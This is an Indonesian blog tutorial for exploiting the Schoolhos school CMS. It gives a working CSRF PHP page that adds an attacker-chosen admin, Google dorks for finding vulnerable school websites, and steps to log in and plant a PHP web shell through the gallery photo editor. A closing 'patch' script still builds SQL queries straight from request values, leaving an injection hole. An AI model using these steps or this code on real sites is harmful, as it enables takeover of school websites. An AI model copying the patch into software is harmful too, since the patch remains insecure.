Kamis, 15 September 2016

Exploit & Patch SchoolHos

Tutorial kali ini yaitu tentang exploit schoolhos. Kali ini kita akan menggunakan CSRF yang digunakan untuk add admin. Ngomong ngomong nih tau gak apa itu schoolhos ?? Dari namanya aja dah keliatan kalo itu identik dengan sekolah. Yap emang bener schoolhos itu adalah CMS yang sering digunakan oleh beberapa website sekolah di Indonesia dan buatan anak bangsa lho.

Oke yuk capcus dah pertama siapin barang barangnya dulu yak

1. CSRF


<?php
$self = $_SERVER["PHP_SELF"];
echo 'Target';
echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";
if(!isset($_GET['url'])){
$url = "http://target.com/adminpanel/database/admin.php";
}else
{
$url = $_GET['url'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Opreax Team</title>
</head>
<body>
<h1>Opreax Team</h1>
<?php echo "Target is : $url"; ?>
<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">
Isi username yang mau di isi <INPUT type="text" name="username" value="opreax"><br>
Pass nya<INPUT type="text" name="password" value="opreax"><br>
<input type="submit" name="insert" value="Insert" >
</form>
</body>
</html>
Copy Paste code diatas ditext editor kalian dan save dengan format php. Contoh : csrf.php
Nah string yang mimin tandai dengan warna merah bisa kalian ganti untuk username dan password yang akan didaftarkan nantinya.

2. Google Dork

  • intext:"Schoolhos Free Open Source CMS"
  • inurl:/?p=berita
  • inurl:/?p=siswa
  • inurl:/?p=galeri
  • inurl:/?p=bukutamu
3. Shell favorit kalian hehe





Oke kalo bahan bahan udah siap mari kita mulai ekskusinya


  1. Kita cari target dulu yang vuln tentunya dengan dork dork diatas
  2. Disini saya mengasumsikan dengan http://smanopreax.sch.id/ oke tinggal kita input di CSRF kita
  3. Tekan submit kemudian tekan insert dan jika berhasil akan diredirect ke www.target.sch.id/adminpanel/login.php. Disini saya mendapatkan link http://smaopreax.sch.id/adminpanel/login.php.
  4. Setelah itu tinggal kita isi username dan password tadi sesuai yang telah kita tuliskan di CSRF tadi. Dalam hal ini saya menuliskan username dan passwordnya opreax. Lalu kita tekan login.
  5. Setelah login kita akan masuk dalam admin panel dan kurang lebih ada menu seperti ini. Pilih menu Album Galeri.
  6. Setelah itu kita pilih Galeri foto








  7. Setelah itu kita pilih salah satu foto kemudian kita pilih edit. Kemudian masukkan shell kalian disana. Kalian bisa mengakses shell kalian itu dengan cara www.target.sch.id/images/foto/galeri/shell_kalian.php
  8. Silahkan bersenang ria dengan shell yang telah tertanam itu. Saya sarankan untuk tidak memporak-porandakan website tersebut karena website tersebut adalah website pendidikan. Dan alangkah baiknya anda jika berniat untuk mempatch website tersebut. Untuk mempatch anda bisa mereplace file www.target.sch.id/adminpanel/aplikasi/database/admin.php dengan file yang bernama sama tetapi bersikan script yang berbeda. Berikut script patchnya
<?php
include "../../../konfigurasi/koneksi.php";
$pilih=$_GET[pilih];
$untukdi=$_GET[untukdi];
date_default_timezone_set('Asia/Jakarta');
$tanggal=date ("Ymd");
$sandi=MD5($_POST[password]);
if ($pilih=='admin' AND $untukdi=='tambah'){
echo "<center><p>This website have been patched by Alastor</p></center></br>
<center><p>Opreax Team - Indonesia</p></br><center><p>You cannot add admin anymore cause it very dangerous</p></center></center>"
}
elseif ($pilih=='admin' AND $untukdi=='edit'){
mysql_query("UPDATE sh_users SET namausers='$_POST[username]',
nama_lengkap_users='$_POST[nama_admin]',
email_users='$_POST[email]'
WHERE s_username ='$_POST[s_username]'");
header('location:../../admin.php');
}
elseif ($pilih=='admin' AND $untukdi=='editadmin'){
mysql_query("UPDATE sh_users SET namausers='$_POST[username]',
nama_lengkap_users='$_POST[nama_admin]',
email_users='$_POST[email]'
WHERE id_users ='$_POST[id]'");
header('location:../../admin.php');
}
elseif ($pilih=='admin' AND $untukdi=='gantipassword'){
mysql_query("UPDATE sh_users SET sandiusers='$sandi'
WHERE id_users ='$_POST[id]'");
header('location:../close_window.html');
}
elseif ($pilih=='admin' AND $untukdi=='hapus'){
$admincurrent=mysql_query("SELECT * FROM sh_users WHERE id_users='$_GET[id]'");
$ac=mysql_fetch_array($admincurrent);
$adminsuper=mysql_query("SELECT * FROM sh_users WHERE level_users='Super Admin'");
$r=mysql_fetch_array($adminsuper);
mysql_query ("UPDATE sh_berita SET s_username = '$r[s_username]' WHERE s_username='$ac[s_username]'");
mysql_query ("UPDATE sh_pengumuman SET s_username = '$r[s_username]' WHERE s_username='$ac[s_username]'");
mysql_query ("UPDATE sh_agenda SET s_username = '$r[s_username]' WHERE s_username='$ac[s_username]'");
if ($ac[level_users]=='Super Admin'){
header('location:../../admin.php');
}
else {
mysql_query("DELETE FROM sh_users WHERE id_users ='$_GET[id]'");
header('location:../../admin.php');}
}?>

Huft sekian tutorial Exploit & Patch SchoolHos. Salam Opreax dari mimin Vindy bye.
Share, Comment, and Like also Subscribe (eh bukan youtube yak wkwk).

Tidak ada komentar:

Posting Komentar